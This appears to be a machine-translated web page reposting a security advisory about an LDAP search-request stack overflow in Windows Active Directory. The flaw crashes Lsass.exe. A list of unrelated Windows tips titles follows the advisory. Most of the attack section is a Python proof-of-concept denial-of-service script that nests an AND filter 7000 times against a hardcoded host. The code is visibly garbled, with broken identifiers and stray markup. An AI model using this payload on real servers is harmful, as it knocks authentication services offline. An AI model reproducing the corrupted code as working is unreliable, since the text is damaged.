The LDAP 3 search request feature of Windows Active Directory lacks the correct buffer boundary check for user submission requests, which can be exploited by remote attackers to cause the Lsass.exe service to crash, triggering a buffer overflow.
The directory service provided through Active Directory is based on the LDAP protocol and uses the protocol to store and obtain Active Directory objects. There is a problem with the 'search request' request function in LDAP using Active Directory. If an attacker builds more than 1000 "AND" requests and sends them to the server, it can trigger a stack overflow and crash the Lsass.exe service. Restart within 30 seconds.
attack:
CORE Security Technologies Advisories ([email protected]) provides the following test methods:
Here is a Python test scripts:
------------------------------------
class ActiveDirectoryDOS( Ldap ): < Br>
def __init__(self):
self._s = None
self.host = '192.168.0.1'
self.basedn = 'dc=bugweek,dc=corelabs, dc = core-sdi, dc = com '
self.port = 389
self.buffer =' '
self.msg_id = 1
Ldap .__ init __ ()
def generateFilter_BinaryOp( self, filter ):
filterBuffer = asn1.OCTETSTRING(filter[1]).encode() + asn1.OCTETSTRING(filter[2]).encode()
filterBuffer = self.encapsulateHeader (filter [0], filterBuffer)
return filterBuffer
def generateFilter_RecursiveBinaryOp (sel f, filter, numTimes):
simpleBinOp = self.generateFilter_BinaryOp( filter )
filterBuffer = simpleBinOp
for cnt in range( 0, numTimes ):
filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND, filterBuffer + simpleBinOp)
return filterBuffer
def searchSub (self, filterBuffer):
self.bindRequest ()
self.searchRequest (filterBuffer)
def run (self, host = '', basedn = '', name = ''):
# the machine must not exist
machine_name = ' xaxax '
filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUAL99vY,' name ', machine_name)
# execute the anonymous query
print' executing query '
filterBuffer = self.generateFilter_RecursiveBinaryOp (filterComputerNotInDir, 7000)
self.searchSub (filterBuffer)
In the Active Directory domain of Windows 2000 and Windows 2003, we can only apply a password policy
Before learning to use Internet Explorer 5.0 browser, understand the working window of Internet Expl
Microsofts network operating system, Windows Server 2003 (Windows 2003), adds many valuable features
Windows2000 is a new generation operating system of Microsoft Corporation. It is developed on the ba
Nine strokes Win 2003 system setup tips
Explore Windows 2000 Unattended Installation
Windows 2000 Security Maintenance and Error Resolution Example
Top Ten "Services" in Windows 2000
How to use the system configuration utility
Windows2003 general problem handling method
Windows 2000 enables and configures offline files
Active Directory Backup and Recovery (2)
Win 2000 common system process list
How to set the font size of the win8 system
Retrieve the Linux superuser root password
Win7 system installation Windows Live Writer failed error code 0x80190194 solution
Win10 can not automatically turn off the screen /standby and sleep reasons and solve the tutorial
Win7 broadband connection prompt error 628 What should I do?
Share the IE10 browser permission under win8 Step
Win7 system one-click restore can not use the prompt can not create restore points
How to do the hard disk light after the win8 system is turned on